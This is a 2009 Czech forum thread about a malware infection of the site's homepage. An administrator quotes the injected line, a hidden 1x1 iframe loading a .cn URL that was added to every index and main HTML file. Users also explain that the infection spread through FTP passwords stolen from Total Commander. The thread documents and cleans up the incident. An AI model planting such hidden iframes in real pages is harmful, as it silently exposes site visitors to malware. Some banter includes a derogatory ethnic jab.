Stránka 1 z 2

virus na hlavní stránce

Napsal: sob dub 18, 2009 2:08 pm
od Wolfik
tak nevím jestli je chyba ve mně nebo máte problémy vy
každopádně jdu proskenovat PC
Obrázek

Napsal: sob dub 18, 2009 2:21 pm
od -HoNY-
Kaspersky mi hlásí jakýsi liteautogreatest.cn

Napsal: sob dub 18, 2009 2:33 pm
od no-X
Koukám na to, několik html souborů bylo k dnešnímu datu v 7:45-7:47 změněno :shock:

Zkusím najít zálohu a přepsat je původními verzemi.

//ed: přepsáno v 14:35

//ed2: vypadá to, že se to stalo docela dost webům... hmm...

Napsal: sob dub 18, 2009 2:47 pm
od Bob van Sikorski
už jsem taky na nějaký web narazil, kde avast houkal ohledně jakéhosi zazipovaného iframe.

Napsal: sob dub 18, 2009 2:52 pm
od no-X
Konkrétně bylo hned na začátek /body/ přidáno:

Kód: Vybrat vše

<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
A to u všech souborů, které mají v názvu "index" nebo "main". A to i takových, které byly přejmenované z důvodu zálohy (např. index_.html), takže nemohly být nalezeny přes nějaký link. Hmm...

RE

Napsal: pon dub 20, 2009 3:52 pm
od Vykupitel
Vyřešeno, ale všem co mají FTP přístup na 3dfx.cz a používají Total Commander, tak do verze 7.04 se používá slabé šifrování na FTP hesla a ten vir je ze souboru krade a pomocí nich se dál šíří. Prosím zkontrolujte i jiné weby co máte ve správě.

Napsal: pon dub 20, 2009 5:08 pm
od Wolfik
a kde se to tam vzalo?

Napsal: pon dub 20, 2009 6:21 pm
od no-X
Nejsem si jistý, jestli přenosem od někoho z lidí, co mají na ftp přístup. Protože ten a předchozí den to nakazilo hromadu webů po celé ČR. A v sobotu večer jsem postřehl, že všechny html soubory byly aktualizované, ale nebyl to vir, obsah zůstal nezměněný. Odhadoval bych to na čistku ze strany hostingu(?)

Napsal: pon dub 20, 2009 7:10 pm
od Rendax
Nebo to má na svědomí OBR či pán 28-mi centimetrů? o:)

Napsal: pon dub 20, 2009 7:15 pm
od no-X
ee, vkládá to odkaz na nějaký zavirovaný web v doméně .cn

Napsal: pon dub 20, 2009 8:03 pm
od socket
cize OBRov kamarat? :twisted:

Napsal: pon dub 20, 2009 9:25 pm
od no-X
Myslíš ukrajince, nebo ty nepřizpůsobivé spoluobčany, na kraji jejichž ghetta bydlí?

Napsal: pon dub 20, 2009 9:26 pm
od socket
OBR ma kamaraty vsade, ktori mu posielaju "virtualne" samply :D

Napsal: pon dub 20, 2009 9:29 pm
od no-X
Jo ty myslíš tyhle... No to pak ještě nezapomínej na ty, které za něj dělají ty testy, pod které se podepisuje (a kteří se asi množí podélným dělením, protože jejich počet v poslední době nějak narostl) :)

Napsal: úte dub 21, 2009 7:23 pm
od -HoNY-
no-X píše:Jo ty myslíš tyhle... No to pak ještě nezapomínej na ty, které za něj dělají ty testy, pod které se podepisuje (a kteří se asi množí podélným dělením, protože jejich počet v poslední době nějak narostl) :)
Jirko! Zapomínáš na komplex méněcennosti =() – i když má víc spolupracovníků, než je kvalitních redaktorů v České republice, pořád to bude málo. (:p)

Napsal: stř dub 22, 2009 10:15 am
od Bob van Sikorski

Napsal: čtv dub 23, 2009 10:41 am
od -HoNY-
Je toto výsledek opravy? Ještě včera mi to nedělalo.

Obrázek

Napsal: čtv dub 23, 2009 11:13 am
od no-X
Neee, to je Rendaxovým avatarem. Má ho na ftpku pod heslem :D

Pošlu mu SZ, pokud neopraví, budu ho muset smazat...

Napsal: čtv dub 23, 2009 1:13 pm
od wolf00
předpokládam že včera probíhala udržba fora,psalo mi to hlášku že se nejde napojit na databáze

Napsal: čtv dub 23, 2009 1:34 pm
od socket
nejdu menit avatary a to som si ho uz chcel dat :(